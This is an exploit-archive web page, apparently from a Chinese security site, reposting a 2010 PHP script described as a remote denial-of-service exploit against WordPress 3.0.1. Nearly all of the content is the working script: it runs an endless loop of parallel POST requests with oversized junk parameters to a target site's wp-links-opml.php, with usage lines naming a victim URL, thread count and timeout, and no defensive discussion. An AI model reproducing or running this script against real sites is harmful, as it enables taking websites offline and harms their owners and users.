首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wordpress 3.0.1 - Remote Denial Of Service Exploit
来源:Cyber-Warrior.Org/CWKnocKout 作者:KnocKout 发布时间:2010-09-10  
###################################
*/ Wordpress 3.0.1 - Remote Denial Of Service Exploit
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3
*/ Contact : knockoutr@msn.com
*/ Category : Remote
                                   Cyber-Warrior.Org/CWKnocKout
                                  
                                    TЬM ЭSLAM ALEMЭNЭN RAMAZAN BAYRAMI MЬBAREK OLSUN
                                   
                                   
##################################
SPECЭAL THANKS
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                         
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

##################Exploit Codes###################################

<?php

// Curl php5 ;)

function info()
{
echo "##################################################################\n";
echo "# Wordpress 3.0.1 - Remote Denial Of Service Exploit\n";
echo "# Author: KnocKout\n";
echo "# Greatz : DaiMon,BARCOD3\n";
echo "##################################################################\n";
echo "# php poc.php target\n";
echo "# php poc.php http://www.victim.com/PATH/ 20 5\n";
echo "________________________________________\n";
exit;
}

if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3]))
{
info();
}

$url = $argv[1];
$threads = (int) $argv[2];
$timeout = (int) $argv[3];

$ptimeout = $timeout * 100;

$packet = implode('+', range(100,999));

while(1)
{
$m = curl_multi_init();

for($i = 0; $i < $threads; $i++)
{
$c[$i] = curl_init();
$opts = array
(
CURLOPT_URL => $url . 'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0',
CURLOPT_USERAGENT => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52',
CURLOPT_ENCODING => 'gzip, deflate',
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => 'search_keywords='. $packet .'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => $timeout,
);
curl_setopt_array($c[$i], $opts);
curl_multi_add_handle($m, $c[$i]);
}

$t = 0;
do
{
curl_multi_exec($m, $r);
usleep(100000);

$t++;

if($t > $ptimeout)
{
curl_multi_close($m);
for($i = 0; $i < $threads; $i++)
{
curl_close($c[$i]);
}
break;
}
}
while($r > 0);

echo '.';
}
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dmx Ready v2 lite Database Dis
·BlogItDL Database Disclosure E
·Beta Asp - Anket Database Disc
·Excel RTD Memory Corruption
·Safari v5.0.1 DLL Hijacking (s
·Webkit (Apple Safari < 4.1.2/5
·Process Hacker Dll Hijacking E
·Microsoft Office Word 2007 spr
·CS Cart 1.3.3 - Install.php XS
·YOPS Web Server Remote Command
·Audiotran 1.4.2.4 SEH Overflow
·Adobe Acrobat and Reader "push
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved